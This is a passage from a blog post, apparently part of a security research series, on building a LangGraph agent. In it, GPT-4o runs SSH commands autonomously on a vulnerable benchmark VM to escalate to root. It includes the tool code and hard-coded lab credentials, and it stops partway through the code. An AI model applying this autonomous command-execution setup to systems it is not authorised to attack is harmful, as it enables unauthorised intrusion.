
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://offensivegraphs.ai/blog/2024/10/10/first-steps-and-initial-version/">
      
      
      
        <link rel="next" href="../../11/improving-configuration-handling-esp-for-tools/">
      
      
      <link rel="icon" href="../../../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.42">
    
    
      
        <title>First Steps and Initial Version - Offensive Graphs Playground</title>
      
    
    
      <link rel="stylesheet" href="../../../../../assets/stylesheets/main.0253249f.min.css">
      
        
        <link rel="stylesheet" href="../../../../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../../../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      
  


  
  

<script id="__analytics">function __md_analytics(){function e(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],e("js",new Date),e("config","G-XVEVXNXJ44"),document.addEventListener("DOMContentLoaded",(function(){document.forms.search&&document.forms.search.query.addEventListener("blur",(function(){this.value&&e("event","search",{search_term:this.value})}));document$.subscribe((function(){var t=document.forms.feedback;if(void 0!==t)for(var a of t.querySelectorAll("[type=submit]"))a.addEventListener("click",(function(a){a.preventDefault();var n=document.location.pathname,d=this.getAttribute("data-md-value");e("event","feedback",{page:n,data:d}),t.firstElementChild.disabled=!0;var r=t.querySelector(".md-feedback__note [data-md-value='"+d+"']");r&&(r.hidden=!1)})),t.hidden=!1})),location$.subscribe((function(t){e("config","G-XVEVXNXJ44",{page_path:t.pathname})}))}));var t=document.createElement("script");t.async=!0,t.src="https://www.googletagmanager.com/gtag/js?id=G-XVEVXNXJ44",document.getElementById("__analytics").insertAdjacentElement("afterEnd",t)}</script>
  
    <script>"undefined"!=typeof __md_analytics&&__md_analytics()</script>
  

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="teal" data-md-color-accent="purple">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#first-steps-and-initial-version" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../../../../.." title="Offensive Graphs Playground" class="md-header__button md-logo" aria-label="Offensive Graphs Playground" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Offensive Graphs Playground
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              First Steps and Initial Version
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="teal" data-md-color-accent="purple"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 6H7c-3.31 0-6 2.69-6 6s2.69 6 6 6h10c3.31 0 6-2.69 6-6s-2.69-6-6-6m0 10H7c-2.21 0-4-1.79-4-4s1.79-4 4-4h10c2.21 0 4 1.79 4 4s-1.79 4-4 4M7 9c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="teal" data-md-color-accent="indigo"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 7H7a5 5 0 0 0-5 5 5 5 0 0 0 5 5h10a5 5 0 0 0 5-5 5 5 0 0 0-5-5m0 8a3 3 0 0 1-3-3 3 3 0 0 1 3-3 3 3 0 0 1 3 3 3 3 0 0 1-3 3"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
    
      <div class="md-header__source">
        <a href="https://github.com/andreashappe/offensivegraphs" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    GitHub
  </div>
</a>
      </div>
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
                
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" hidden>
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    



<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../../../.." title="Offensive Graphs Playground" class="md-nav__button md-logo" aria-label="Offensive Graphs Playground" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    Offensive Graphs Playground
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/andreashappe/offensivegraphs" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81"/></svg>
  </div>
  <div class="md-source__repository">
    GitHub
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../.." class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Welcome to the Playground
  </span>
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Examples
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            Examples
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../../examples/linux-priv-esc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Linux Privilege Escalation
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Documentation Series:
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Documentation Series:
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../../series/initial-journey/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Security Agents with LangGraph
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../../../series/planning-and-decision-making/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Planning and Decision Making
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
                
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#scencario-and-starting-situation" class="md-nav__link">
    <span class="md-ellipsis">
      Scencario and Starting Situation
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#the-first-prototype" class="md-nav__link">
    <span class="md-ellipsis">
      The First Prototype
    </span>
  </a>
  
    <nav class="md-nav" aria-label="The First Prototype">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#tool-calling-enable-ssh-command-execution" class="md-nav__link">
    <span class="md-ellipsis">
      Tool-Calling: enable SSH command execution
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-privilege-escalation-prototype" class="md-nav__link">
    <span class="md-ellipsis">
      The Privilege Escalation Prototype
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-graph-in-its-full-glory" class="md-nav__link">
    <span class="md-ellipsis">
      The graph in it's full glory
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#execute-it" class="md-nav__link">
    <span class="md-ellipsis">
      Execute it
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#next-steps-and-todos" class="md-nav__link">
    <span class="md-ellipsis">
      Next Steps and TODOs
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
  <div class="md-content md-content--post" data-md-component="content">
    <div class="md-sidebar md-sidebar--post" data-md-component="sidebar" data-md-type="navigation">
      <div class="md-sidebar__scrollwrap">
        <div class="md-sidebar__inner md-post">
          <nav class="md-nav md-nav--primary">
            <div class="md-post__back">
              <div class="md-nav__title md-nav__container">
                <a href="../../../../" class="md-nav__link">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
                  <span class="md-ellipsis">
                    Back to index
                  </span>
                </a>
              </div>
            </div>
            
              <div class="md-post__authors md-typeset">
                
                  <div class="md-profile md-post__profile">
                    <span class="md-author md-author--long">
                      <img src="https://avatars.githubusercontent.com/u/20667?v=4" alt="Andreas Happe">
                    </span>
                    <span class="md-profile__description">
                      <strong>
                        
                          <a href="https://github.com/andreashappe">Andreas Happe</a>
                        
                      </strong>
                      <br>
                      Creator
                    </span>
                  </div>
                
                  <div class="md-profile md-post__profile">
                    <span class="md-author md-author--long">
                      <img src="https://avatars.githubusercontent.com/u/3877188?v=4" alt="Jürgen Brandl">
                    </span>
                    <span class="md-profile__description">
                      <strong>
                        
                          <a href="https://github.com/brandl">Jürgen Brandl</a>
                        
                      </strong>
                      <br>
                      Co-Creator
                    </span>
                  </div>
                
              </div>
            
            <ul class="md-post__meta md-nav__list">
              <li class="md-nav__item md-nav__item--section">
                <div class="md-post__title">
                  <span class="md-ellipsis">
                    Metadata
                  </span>
                </div>
                <nav class="md-nav">
                  <ul class="md-nav__list">
                    <li class="md-nav__item">
                      <div class="md-nav__link">
                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 19H5V8h14m-3-7v2H8V1H6v2H5c-1.11 0-2 .89-2 2v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2h-1V1m-1 11h-5v5h5z"/></svg>
                        <time datetime="2024-10-10 00:00:00" class="md-ellipsis">October 10, 2024</time>
                      </div>
                    </li>
                    
                    
                      <li class="md-nav__item">
                        <div class="md-nav__link">
                          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9 3v15h3V3zm3 2 4 13 3-1-4-13zM5 5v13h3V5zM3 19v2h18v-2z"/></svg>
                          <span class="md-ellipsis">
                            in
                            
                              <a href="../../../../category/initial-journey/">initial-journey</a></span>
                        </div>
                      </li>
                    
                    
                      
                      <li class="md-nav__item">
                        <div class="md-nav__link">
                          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 20a8 8 0 0 0 8-8 8 8 0 0 0-8-8 8 8 0 0 0-8 8 8 8 0 0 0 8 8m0-18a10 10 0 0 1 10 10 10 10 0 0 1-10 10C6.47 22 2 17.5 2 12A10 10 0 0 1 12 2m.5 5v5.25l4.5 2.67-.75 1.23L11 13V7z"/></svg>
                          <span class="md-ellipsis">
                            
                              12 min read
                            
                          </span>
                        </div>
                      </li>
                    
                  </ul>
                </nav>
              </li>
            </ul>
          </nav>
          
        </div>
      </div>
    </div>
    <article class="md-content__inner md-typeset">
      
        

  
  


<h1 id="first-steps-and-initial-version">First Steps and Initial Version</h1>
<p>This started when <a href="https://github.com/brandl">Jürgen</a> contacted <a href="https://github.com/andreashappe">Andreas</a> as he needed an automated attacker emulation for one of his defensive projects. Andreas wrote the initial version of <a href="https://hackingbuddy.ai">hackingBuddyGPT</a> in March 2023 (roughly 18 months ago) and much of the codebase was written for older, less-sophisticated, LLMs. Juergen had experience with <a href="https://www.langchain.com/langgraph">LangGraph</a>, so we decided to play around with using langgraph for offensive security.</p>
<h2 id="scencario-and-starting-situation">Scencario and Starting Situation</h2>
<p>As an initial example we have chosen Linux Privilege Escalation: in these scenarios, you already have access to a linux system (typically over SSH) as a low-privilege user and want to become the all powerful root user.</p>
<p>As a starting point, we were using both <a href="https://langchain-ai.github.io/langgraph/tutorials/introduction/">langgaph's quickstart tutorial</a> for rough guidance, as well as Andreas' original SSH connector to connect to a vulnerable virtual machine provided by <a href="https://github.com/ipa-lab/benchmark-privesc-linux">ipa-lab/benchmark-privesc-linux</a> (also originally written by Andreas).</p>
<p>The following langgraph pages give good background knowledge:</p>
<ul>
<li><a href="https://langchain-ai.github.io/langgraph/">The Langgraph starting page</a></li>
<li><a href="https://langchain-ai.github.io/langgraph/tutorials/introduction/">Langraph QuickStart</a> (part of the tutorial series)</li>
<li>More information about <code>tool usage</code> can also be found <a href="https://python.langchain.com/docs/how_to/custom_tools/#tool-decorator">within the documentation</a></li>
</ul>
<h2 id="the-first-prototype">The First Prototype</h2>
<p>So as a starting point we want to replicate the functonality of <a href="https://hackingbuddy.ai">hackingBuddyGPT</a> in the most simple and abstract way. Think of it like this:</p>
<p><img alt="Concept" src="../../../../initial_version_conceptual.drawio.png" /></p>
<p>You have a vulnerable VM that allows for the execution of arbitrary commands via SSH. We want to use a LLM (OpenAI GPT4o in this example) to internally think of a strategy and execute commands until our goal of becoming root is reached, in which case we terminate.</p>
<p>This prototype source code can be found <a href="https://github.com/andreashappe/offensivegraphs/tree/64ae8a080c5aa5e7255e1cb00c8ddb5adc6d1a20">in the github history</a>. If you look into the current <code>main</code> branch, the current source code will look differently.</p>
<p>We split the functionality into two files: <code>ssh.py</code> for all the SSH callouts performed by the prototype, and <code>initial_version.py</code> containg the actual prototype logic.</p>
<h3 id="tool-calling-enable-ssh-command-execution">Tool-Calling: enable SSH command execution</h3>
<p>Tools allow LLMs to access external operations. In our case, we want LLMs to execute commands over SSH on a remote host. Let's go through parts of the code in <code>ssh.py</code>:</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">ssh.py: Declare the Tool Function</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-0-33">33</a></span>
<span class="normal"><a href="#__codelineno-0-34">34</a></span>
<span class="normal"><a href="#__codelineno-0-35">35</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-0-33"><a id="__codelineno-0-33" name="__codelineno-0-33"></a><span class="nd">@tool</span>
</span><span id="__span-0-34"><a id="__codelineno-0-34" name="__codelineno-0-34"></a><span class="k">def</span> <span class="nf">ssh_execute_command</span><span class="p">(</span><span class="n">command</span><span class="p">:</span><span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">str</span><span class="p">:</span>
</span><span id="__span-0-35"><a id="__codelineno-0-35" name="__codelineno-0-35"></a><span class="w">        </span><span class="sd">&quot;&quot;&quot; Execute command over SSH on the remote machine &quot;&quot;&quot;</span>
</span></code></pre></div></td></tr></table></div>
<p>We initially started by using <a href="https://langchain-ai.github.io/langgraph/how-tos/pass-run-time-values-to-tools/#define-the-tools">langchain's @tool annotation</a> (line 33). This will later allow LLMs to call the <code>ssh_execute_command</code> function. It is important to give a good docstring, as this will be automatically be used to explain the purpose of the tool to the LLM. Parameters and output values will automagically be matched too!</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">ssh.py: Open the SSH connection</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-1-37">37</a></span>
<span class="normal"><a href="#__codelineno-1-38">38</a></span>
<span class="normal"><a href="#__codelineno-1-39">39</a></span>
<span class="normal"><a href="#__codelineno-1-40">40</a></span>
<span class="normal"><a href="#__codelineno-1-41">41</a></span>
<span class="normal"><a href="#__codelineno-1-42">42</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-1-37"><a id="__codelineno-1-37" name="__codelineno-1-37"></a>        <span class="n">username</span> <span class="o">=</span> <span class="s1">&#39;lowpriv&#39;</span>
</span><span id="__span-1-38"><a id="__codelineno-1-38" name="__codelineno-1-38"></a>        <span class="n">password</span> <span class="o">=</span> <span class="s1">&#39;trustno1&#39;</span>
</span><span id="__span-1-39"><a id="__codelineno-1-39" name="__codelineno-1-39"></a>        <span class="n">host</span> <span class="o">=</span> <span class="s1">&#39;192.168.121.112&#39;</span>
</span><span id="__span-1-40"><a id="__codelineno-1-40" name="__codelineno-1-40"></a>        <span class="n">hostname</span> <span class="o">=</span> <span class="s1">&#39;test-1&#39;</span>
</span><span id="__span-1-41"><a id="__codelineno-1-41" name="__codelineno-1-41"></a>        <span class="n">conn</span> <span class="o">=</span> <span class="n">SSHConnection</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="n">host</span><span class="p">,</span> <span class="n">hostname</span><span class="o">=</span><span class="n">hostname</span><span class="p">,</span> <span class="n">username</span><span class="o">=</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="n">password</span><span class="p">)</span>
</span><span id="__span-1-42"><a id="__codelineno-1-42" name="__codelineno-1-42"></a>        <span class="n">conn</span><span class="o">.</span><span class="n">connect</span><span class="p">()</span>
</span></code></pre></div></td></tr></table></div>
<p>This is ugly hard-coded cruft. We open a SSH connection to a hard-coded target host. We will make this configurable in the next blog post.</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">ssh.py: Execute a command and return a value</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-2-44">44</a></span>
<span class="normal"><a href="#__codelineno-2-45">45</a></span>
<span class="normal"><a href="#__codelineno-2-46">46</a></span>
<span class="normal"><a href="#__codelineno-2-47">47</a></span>
<span class="normal"><a href="#__codelineno-2-48">48</a></span>
<span class="normal"><a href="#__codelineno-2-49">49</a></span>
<span class="normal"><a href="#__codelineno-2-50">50</a></span>
<span class="normal"><a href="#__codelineno-2-51">51</a></span>
<span class="normal"><a href="#__codelineno-2-52">52</a></span>
<span class="normal"><a href="#__codelineno-2-53">53</a></span>
<span class="normal"><a href="#__codelineno-2-54">54</a></span>
<span class="normal"><a href="#__codelineno-2-55">55</a></span>
<span class="normal"><a href="#__codelineno-2-56">56</a></span>
<span class="normal"><a href="#__codelineno-2-57">57</a></span>
<span class="normal"><a href="#__codelineno-2-58">58</a></span>
<span class="normal"><a href="#__codelineno-2-59">59</a></span>
<span class="normal"><a href="#__codelineno-2-60">60</a></span>
<span class="normal"><a href="#__codelineno-2-61">61</a></span>
<span class="normal"><a href="#__codelineno-2-62">62</a></span>
<span class="normal"><a href="#__codelineno-2-63">63</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-2-44"><a id="__codelineno-2-44" name="__codelineno-2-44"></a>        <span class="n">sudo_pass</span> <span class="o">=</span> <span class="n">Responder</span><span class="p">(</span>
</span><span id="__span-2-45"><a id="__codelineno-2-45" name="__codelineno-2-45"></a>            <span class="n">pattern</span><span class="o">=</span><span class="sa">r</span><span class="s2">&quot;\[sudo\] password for &quot;</span> <span class="o">+</span> <span class="n">username</span> <span class="o">+</span> <span class="s2">&quot;:&quot;</span><span class="p">,</span>
</span><span id="__span-2-46"><a id="__codelineno-2-46" name="__codelineno-2-46"></a>            <span class="n">response</span><span class="o">=</span><span class="n">password</span> <span class="o">+</span> <span class="s2">&quot;</span><span class="se">\n</span><span class="s2">&quot;</span><span class="p">,</span>
</span><span id="__span-2-47"><a id="__codelineno-2-47" name="__codelineno-2-47"></a>        <span class="p">)</span>
</span><span id="__span-2-48"><a id="__codelineno-2-48" name="__codelineno-2-48"></a>
</span><span id="__span-2-49"><a id="__codelineno-2-49" name="__codelineno-2-49"></a>        <span class="n">out</span> <span class="o">=</span> <span class="n">StringIO</span><span class="p">()</span>
</span><span id="__span-2-50"><a id="__codelineno-2-50" name="__codelineno-2-50"></a>        <span class="k">try</span><span class="p">:</span>
</span><span id="__span-2-51"><a id="__codelineno-2-51" name="__codelineno-2-51"></a>            <span class="n">conn</span><span class="o">.</span><span class="n">run</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="n">pty</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">warn</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">out_stream</span><span class="o">=</span><span class="n">out</span><span class="p">,</span> <span class="n">watchers</span><span class="o">=</span><span class="p">[</span><span class="n">sudo_pass</span><span class="p">],</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span>
</span><span id="__span-2-52"><a id="__codelineno-2-52" name="__codelineno-2-52"></a>        <span class="k">except</span> <span class="ne">Exception</span><span class="p">:</span>
</span><span id="__span-2-53"><a id="__codelineno-2-53" name="__codelineno-2-53"></a>            <span class="nb">print</span><span class="p">(</span><span class="s2">&quot;TIMEOUT! Could we have become root?&quot;</span><span class="p">)</span>
</span><span id="__span-2-54"><a id="__codelineno-2-54" name="__codelineno-2-54"></a>        <span class="n">out</span><span class="o">.</span><span class="n">seek</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</span><span id="__span-2-55"><a id="__codelineno-2-55" name="__codelineno-2-55"></a>        <span class="n">tmp</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>
</span><span id="__span-2-56"><a id="__codelineno-2-56" name="__codelineno-2-56"></a>        <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">out</span><span class="o">.</span><span class="n">readlines</span><span class="p">():</span>
</span><span id="__span-2-57"><a id="__codelineno-2-57" name="__codelineno-2-57"></a>            <span class="k">if</span> <span class="ow">not</span> <span class="n">line</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s2">&quot;[sudo] password for &quot;</span> <span class="o">+</span> <span class="n">username</span> <span class="o">+</span> <span class="s2">&quot;:&quot;</span><span class="p">):</span>
</span><span id="__span-2-58"><a id="__codelineno-2-58" name="__codelineno-2-58"></a>                <span class="n">line</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&quot;</span><span class="se">\r</span><span class="s2">&quot;</span><span class="p">,</span> <span class="s2">&quot;&quot;</span><span class="p">)</span>
</span><span id="__span-2-59"><a id="__codelineno-2-59" name="__codelineno-2-59"></a>                <span class="n">tmp</span> <span class="o">=</span> <span class="n">tmp</span> <span class="o">+</span> <span class="n">line</span>
</span><span id="__span-2-60"><a id="__codelineno-2-60" name="__codelineno-2-60"></a>
</span><span id="__span-2-61"><a id="__codelineno-2-61" name="__codelineno-2-61"></a>        <span class="nb">print</span><span class="p">(</span><span class="s2">&quot;cmd executed:&quot;</span><span class="p">,</span> <span class="n">command</span><span class="p">)</span>
</span><span id="__span-2-62"><a id="__codelineno-2-62" name="__codelineno-2-62"></a>        <span class="nb">print</span><span class="p">(</span><span class="s2">&quot;result: &quot;</span><span class="p">,</span> <span class="n">tmp</span><span class="p">)</span>
</span><span id="__span-2-63"><a id="__codelineno-2-63" name="__codelineno-2-63"></a>        <span class="k">return</span> <span class="n">tmp</span>
</span></code></pre></div></td></tr></table></div>
<p>This is the actual code that executes a SSH command and captures it's output. This is also old cruft and hopefully looks better in the current version within the repository.</p>
<p>The import thing to note is line 63: here we return the output of the executed command as string from the fuction. LangChain will take this output and return it to the LLM as result of the tool call.</p>
<h3 id="the-privilege-escalation-prototype">The Privilege Escalation Prototype</h3>
<p>Let's go the 'meat' of the code, the langgraph agent in <code>initial_version.py</code>:</p>
<div class="language-python highlight"><table class="highlighttable"><tr><th colspan="2" class="filename"><span class="filename">initial_version.py: Setup</span></th></tr><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-3-16">16</a></span>
<span class="normal"><a href="#__codelineno-3-17">17</a></span>
<span class="normal"><a href="#__codelineno-3-18">18</a></span>
<span class="normal"><a href="#__codelineno-3-19">19</a></span>
<span class="normal"><a href="#__codelineno-3-20">20</a></span>
<span class="normal"><a href="#__codelineno-3-21">21</a></span>
<span class="normal"><a href="#__codelineno-3-22">22</a></span>
